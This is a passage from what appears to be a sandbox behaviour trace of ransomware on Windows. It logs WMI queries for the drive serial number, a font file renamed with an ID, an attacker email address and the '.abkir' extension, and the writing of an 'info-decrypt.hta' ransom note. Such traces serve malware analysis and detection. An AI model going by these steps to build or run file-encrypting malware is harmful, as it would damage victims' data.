[1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0167.341] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0167.342] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0167.342] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0167.342] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0167.342] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x2 [0167.342] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x1 [0167.342] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0167.342] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0167.342] WbemLocator:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60276a0) returned 0x0 [0167.342] WbemLocator:IUnknown:AddRef (This=0x60276a0) returned 0x3 [0167.342] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x2 [0167.342] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0167.342] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0167.342] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.342] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x60276c0) returned 0x0 [0167.342] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60276c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x603326c) returned 0x0 [0168.013] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0x66b27ac) returned 0x0 [0168.013] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b27ac, pProxy=0x603326c, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0168.013] WbemLocator:IUnknown:Release (This=0x66b27ac) returned 0x1 [0168.013] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0x66b27cc) returned 0x0 [0168.013] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0x66b27ac) returned 0x0 [0168.013] WbemLocator:IClientSecurity:SetBlanket (This=0x66b27ac, pProxy=0x603326c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0168.014] WbemLocator:IUnknown:Release (This=0x66b27ac) returned 0x2 [0168.014] WbemLocator:IUnknown:Release (This=0x66b27cc) returned 0x1 [0168.014] CoTaskMemFree (pv=0xbd4a08) [0168.014] WbemLocator:IUnknown:Release (This=0x60276c0) returned 0x0 [0168.680] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0x66b27cc) returned 0x0 [0168.680] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0168.810] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0168.812] WbemLocator:IUnknown:AddRef (This=0x66b27cc) returned 0x3 [0168.812] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0168.813] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0168.817] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0x66b272c) returned 0x0 [0168.817] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b272c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0168.818] WbemLocator:IUnknown:Release (This=0x66b272c) returned 0x3 [0168.818] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0168.818] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0168.818] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0x66b27b4) returned 0x0 [0168.818] WbemLocator:IRpcOptions:Query (in: This=0x66b27b4, pPrx=0x66b27cc, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0168.818] WbemLocator:IUnknown:Release (This=0x66b27b4) returned 0x3 [0168.818] WbemLocator:IUnknown:Release (This=0x66b27cc) returned 0x2 [0168.818] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0168.818] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0168.818] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x603326c) returned 0x0 [0168.818] WbemLocator:IUnknown:AddRef (This=0x603326c) returned 0x4 [0168.818] WbemLocator:IUnknown:Release (This=0x603326c) returned 0x3 [0168.818] WbemLocator:IUnknown:Release (This=0x603326c) returned 0x2 [0168.819] SysStringLen (param_1=0x0) returned 0x0 [0168.819] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0168.819] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0168.819] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0168.819] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0168.819] WbemLocator:IUnknown:AddRef (This=0x66b27cc) returned 0x3 [0168.819] WbemLocator:IUnknown:QueryInterface (in: This=0x66b27cc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0x66b27cc) returned 0x0 [0168.819] WbemLocator:IUnknown:Release (This=0x66b27cc) returned 0x3 [0168.820] WbemLocator:IUnknown:Release (This=0x66b27cc) returned 0x2 [0168.820] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0168.820] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0168.820] IWbemServices:GetObject (in: This=0x603326c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0169.516] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0169.516] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0169.516] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0169.516] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36269c0*=0, plFlavor=0x36269c4*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36269c0*=8, plFlavor=0x36269c4*=0) returned 0x0 [0169.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.516] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36269c0*=8, plFlavor=0x36269c4*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36269c0*=8, plFlavor=0x36269c4*=0) returned 0x0 [0169.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFilePart=0x0) returned 0x43 [0169.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x66 [0169.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0169.517] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1fcd2f00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0169.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0169.517] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0169.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee4c) returned 1 [0169.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", nBufferLength=0x105, lpBuffer=0x6d8e954, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0169.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", nBufferLength=0x105, lpBuffer=0x6d8e928, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpFilePart=0x0) returned 0x3d [0169.606] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x6d8eb74 | out: lpFindFileData=0x6d8eb74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0169.606] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.606] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0169.606] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.607] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0169.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee0c) returned 1 [0169.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee18) returned 1 [0169.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee4c) returned 1 [0169.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", nBufferLength=0x105, lpBuffer=0x6d8e954, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpFilePart=0x0) returned 0x3c [0169.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", nBufferLength=0x105, lpBuffer=0x6d8e928, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", lpFilePart=0x0) returned 0x3d [0169.607] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x6d8eb74 | out: lpFindFileData=0x6d8eb74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0169.607] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.607] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0169.608] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x6d8eb84 | out: lpFindFileData=0x6d8eb84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0169.608] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0169.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee0c) returned 1 [0169.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee18) returned 1 [0169.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0169.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta", lpFilePart=0x0) returned 0x4d [0169.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed28) returned 1 [0169.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8eda4 | out: lpFileInformation=0x6d8eda4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed24) returned 1 [0169.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0169.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e768, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta", lpFilePart=0x0) returned 0x4d [0169.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ec5c) returned 1 [0169.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0169.609] GetFileType (hFile=0x208) returned 0x1 [0169.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ec58) returned 1 [0169.609] GetFileType (hFile=0x208) returned 0x1 [0169.609] WriteFile (in: hFile=0x208, lpBuffer=0x376e994*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed20, lpOverlapped=0x0 | out: lpBuffer=0x376e994*, lpNumberOfBytesWritten=0x6d8ed20*=0x1000, lpOverlapped=0x0) returned 1 [0169.610] WriteFile (in: hFile=0x208, lpBuffer=0x376e994*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ecf4, lpOverlapped=0x0 | out: lpBuffer=0x376e994*, lpNumberOfBytesWritten=0x6d8ecf4*=0x55e, lpOverlapped=0x0) returned 1 [0169.611] CloseHandle (hObject=0x208) returned 1 [0169.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0169.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed74) returned 1 [0169.611] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), fInfoLevelId=0x0, lpFileInformation=0x376f9b0 | out: lpFileInformation=0x376f9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, 